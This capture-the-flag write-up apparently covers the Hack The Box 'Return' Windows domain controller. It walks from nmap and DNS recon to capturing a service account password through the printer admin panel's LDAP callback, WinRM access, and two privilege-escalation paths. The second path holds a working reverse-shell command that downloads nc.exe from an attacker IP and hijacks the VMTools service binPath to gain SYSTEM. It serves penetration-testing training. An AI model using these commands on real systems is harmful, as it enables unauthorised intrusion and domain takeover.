Return

Recon

nmap_scan.log

Open 10.129.95.241:53
Open 10.129.95.241:80
Open 10.129.95.241:88
Open 10.129.95.241:135
Open 10.129.95.241:139
Open 10.129.95.241:389
Open 10.129.95.241:445
Open 10.129.95.241:464
Open 10.129.95.241:593
Open 10.129.95.241:636
Open 10.129.95.241:3268
Open 10.129.95.241:3269
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.95.241

PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
80/tcp   open  http          syn-ack Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-11-27 18:07:23Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-27T18:07:32
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 36281/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 31622/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54162/udp): CLEAN (Timeout)
|   Check 4 (port 13626/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 18m34s

DNS (53)

└─$ dig ANY return.local @10.129.95.241

; <<>> DiG 9.19.21-1-Debian <<>> ANY return.local @10.129.95.241
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40410
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: e0aecc3fd2bd8c99 (echoed)
;; QUESTION SECTION:
;return.local.                  IN      ANY

;; ANSWER SECTION:
return.local.           600     IN      A       10.129.95.241
return.local.           3600    IN      NS      printer.return.local.
return.local.           3600    IN      SOA     printer.return.local. hostmaster.return.local. 123 900 600 86400 3600
return.local.           600     IN      AAAA    dead:beef::247

;; ADDITIONAL SECTION:
printer.return.local.   1200    IN      A       10.129.95.241
printer.return.local.   1200    IN      AAAA    dead:beef::1d65:68c2:f133:61bd
printer.return.local.   1200    IN      AAAA    dead:beef::1f6

;; Query time: 84 msec
;; SERVER: 10.129.95.241#53(10.129.95.241) (TCP)
;; WHEN: Wed Nov 27 12:50:27 EST 2024
;; MSG SIZE  rcvd: 238

HTTP (80)

POST request contains ip address and that's it, SSRF?

└─$ listen 389
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:389
Ncat: Listening on 0.0.0.0:389
Ncat: Connection from 10.129.95.241:61747.
0*`%return\svc-printer
0*`%return\svc-printer
                      1edFg43012!!

WinRM (svc-printer)

└─$ netexec smb 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB         10.129.95.241   445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.129.95.241   445    PRINTER          [+] return.local\svc-printer:1edFg43012!!
SMB         10.129.95.241   445    PRINTER          [*] Enumerated shares
SMB         10.129.95.241   445    PRINTER          Share           Permissions     Remark
SMB         10.129.95.241   445    PRINTER          -----           -----------     ------
SMB         10.129.95.241   445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.129.95.241   445    PRINTER          C$              READ,WRITE      Default share
SMB         10.129.95.241   445    PRINTER          IPC$            READ            Remote IPC
SMB         10.129.95.241   445    PRINTER          NETLOGON        READ            Logon server share
SMB         10.129.95.241   445    PRINTER          SYSVOL          READ            Logon server share

└─$ netexec winrm 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
WINRM       10.129.95.241   5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM       10.129.95.241   5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

└─$ evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer> whoami /all

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

User.txt

*Evil-WinRM* PS C:\Users\svc-printer> ls $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }

    Directory: C:\Users\svc-printer\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/27/2024  10:05 AM             34 user.txt

68f6758bf7c0c46e0afa1683db90ef69

Privilege Escalation

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#serestoreprivilege

Cicada had similar privilege escalation path, more details there. [Cicada](

)

Root.txt (Path 1)

*Evil-WinRM* PS C:\Users\svc-printer> robocopy /b C:\Users\Administrator\Desktop C:\Users\svc-printer root.txt
*Evil-WinRM* PS C:\Users\svc-printer> cat root.txt
4ad8c7c517a0a92c4c1a3920ff2b8373

Root.txt (Path 2)

User is part of Server Operators group; The group has full control over certain services, allowing for the execution of arbitrary commands and privilege escalation (source)

Windows Privilege Escalation: Server Operator Group

*Evil-WinRM* PS C:\Users\svc-printer> services

Path                                                                                                                 Privileges Service
----                                                                                                                 ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                        True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc

*Evil-WinRM* PS C:\Users\svc-printer\Music> curl 10.10.14.99/nc.exe -out nc.exe
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe config VMTools binPath="C:\Users\svc-printer\Music\nc.exe -e powershell.exe 10.10.14.99 4444"
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe stop VMTools
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe start VMTools
---
└─$ listen
Ncat: Connection from 10.129.95.241:62800.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system

PreviousResolute NextSandworm

Last updated 8 months ago

hashtagRecon

hashtagDNS (53)

hashtagHTTP (80)

hashtagWinRM (svc-printer)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt (Path 1)

hashtagRoot.txt (Path 2)